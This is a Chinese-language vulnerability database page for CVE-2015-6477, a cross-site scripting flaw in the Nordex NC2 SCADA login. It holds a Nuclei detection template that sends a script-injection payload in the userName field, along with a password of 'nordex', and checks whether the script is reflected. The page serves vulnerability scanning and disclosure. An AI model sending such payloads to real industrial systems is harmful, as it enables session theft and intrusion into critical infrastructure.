CVE-2015-6477: Nordex NC2 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Nordex NC2 | POC: 已公开

漏洞描述

Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PoC代码[已公开]

id: CVE-2015-6477

info:
  name: Nordex NC2  - Cross-Site Scripting
  author: geeknik
  severity: medium
  description: Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://seclists.org/fulldisclosure/2015/Dec/117
    - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01
    - https://nvd.nist.gov/vuln/detail/CVE-2015-6477
    - http://packetstormsecurity.com/files/135068/Nordex-Control-2-NC2-SCADA-16-Cross-Site-Scripting.html
    - http://seclists.org/fulldisclosure/2015/Dec/117
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2015-6477
    cwe-id: CWE-79
    epss-score: 0.3338
    epss-percentile: 0.96792
    cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: nordex
    product: nordex_control_2_scada
  tags: cve2015,cve,seclists,packetstorm,xss,iot,nordex,nc2

http:
  - method: POST
    path:
      - "{{BaseURL}}/login"

    body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en'

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        words:
          - "</script><script>alert('{{randstr}}')</script>"
# digest: 4a0a0047304502200788ede1ac21cc87d04b88742b7a8ada91978f731112905c17ba26ea89b2cae8022100d5b480a23bf13d7fbeae8c89327706bd7621c5e8d8b866b3bfb092c7217b0ef4:922c64590222798bb761d5b6d8e72950

相关漏洞推荐